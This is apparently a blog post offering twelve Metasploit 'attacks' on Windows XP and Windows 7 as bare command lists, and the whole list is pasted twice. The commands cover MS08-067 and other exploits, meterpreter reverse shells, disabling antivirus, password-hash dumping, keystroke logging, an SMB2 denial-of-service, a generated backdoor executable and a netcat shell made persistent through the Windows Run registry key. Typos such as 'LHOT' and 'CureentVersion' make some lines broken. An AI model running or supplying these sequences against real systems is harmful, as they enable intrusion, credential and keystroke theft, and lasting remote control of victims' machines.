Hey guys, I've already explained about Metasploit and a few of it's attacks. This post is only for Metasploit users who know the basics of meterpreter, payloads and other stuff. Don't waste your time in reading this if you don't know about Metasploit. So what's new in this post, let's find out :
Requisites:
Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain
Note:~ All these tutorials are just commands, because as you can see there are loads of them so just understand them by your own (You just need to run these commands).
Ok so without wasting a second let's do it.
Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control
use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit
Attack 2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1 ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell
Attack 3. Hacking By Metasploit . Windows xp Sp3
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1 --->ip attacker
set RHOST 192.168.1.1 ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit
Attack 4: Hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1 ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192. ------>ip target
set RPORT 4321
show options
exploit
Attack 5: Exploit vulnerability in Windows 7
sudo nmap 192.168.1.1 ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1 -----------ip target
set RPORT 445
run ----run the exploit
Attack 6: Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1 --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen
Attack 7: ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7 --ip target
exploit
Attack 8: IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/ ---enter
wait a few moments...
Attack 9: metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1 ---->ip target
set LHOST 192.168.0.1 ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir
Attack 10: Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3 ---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer
Attack 12: ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\
Requisites:
Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain
Note:~ All these tutorials are just commands, because as you can see there are loads of them so just understand them by your own (You just need to run these commands).
Ok so without wasting a second let's do it.
Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control
use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit
Attack 2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1 ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell
Attack 3. Hacking By Metasploit . Windows xp Sp3
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1 --->ip attacker
set RHOST 192.168.1.1 ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit
Attack 4: Hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1 ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192. ------>ip target
set RPORT 4321
show options
exploit
Attack 5: Exploit vulnerability in Windows 7
sudo nmap 192.168.1.1 ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1 -----------ip target
set RPORT 445
run ----run the exploit
Attack 6: Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1 --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen
Attack 7: ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7 --ip target
exploit
Attack 8: IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/ ---enter
wait a few moments...
Attack 9: metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1 ---->ip target
set LHOST 192.168.0.1 ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir
Attack 10: Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3 ---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer
Attack 12: ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\